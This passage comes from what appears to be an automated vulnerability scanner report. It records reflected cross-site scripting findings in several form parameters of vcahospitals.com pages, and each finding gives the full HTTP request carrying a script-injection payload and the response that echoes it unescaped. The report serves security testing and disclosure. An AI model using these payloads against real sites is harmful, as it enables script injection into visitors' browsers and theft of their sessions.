<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c=1" />
...[SNIP]...

2.8. http://www.vcahospitals.com/hanson/offer.html [addr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998d7"><script>alert(1)</script>24a59a02e19 was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=998d7"><script>alert(1)</script>24a59a02e19&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o6021kabr6ia1bncmhj0ivp1j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="addr" id="addr" type="text" size="50" class="req" maxlength="255" value="998d7"><script>alert(1)</script>24a59a02e19" />
...[SNIP]...

2.9. http://www.vcahospitals.com/hanson/offer.html [captcha_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the captcha_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913cb"><script>alert(1)</script>e854b346b04 was submitted in the captcha_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:03 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8oag095b9alesr04oe0qrcema0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcah
...[SNIP]...

2.10. http://www.vcahospitals.com/hanson/offer.html [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bbf"><script>alert(1)</script>a5aae805f3c was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=75bbf"><script>alert(1)</script>a5aae805f3c&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odcmj1resusthd8a2o5c117463; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="city" id="city" type="text" size="40" class="req" maxlength="255" value="75bbf"><script>alert(1)</script>a5aae805f3c" />
...[SNIP]...

2.11. http://www.vcahospitals.com/hanson/offer.html [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a242"><script>alert(1)</script>c14d1d110d8 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=8a242"><script>alert(1)</script>c14d1d110d8&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=p2odhpks37cmhn3tkfcpdu3fp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="email" id="email" type="text" size="40" maxlength="255" value="8a242"><script>alert(1)</script>c14d1d110d8" />
...[SNIP]...

2.12. http://www.vcahospitals.com/hanson/offer.html [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51a8"><script>alert(1)</script>4d0141775d0 was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=f51a8"><script>alert(1)</script>4d0141775d0&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:16 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4b778k6m2ab1pu0m5ssdhgvgn4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="f51a8"><script>alert(1)</script>4d0141775d0" />
...[SNIP]...

2.13. http://www.vcahospitals.com/hanson/offer.html [formtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d61d6"><script>alert(1)</script>e3343c73882 was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=jvjkp2a3ouqtrsla9j7rqfi8m5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
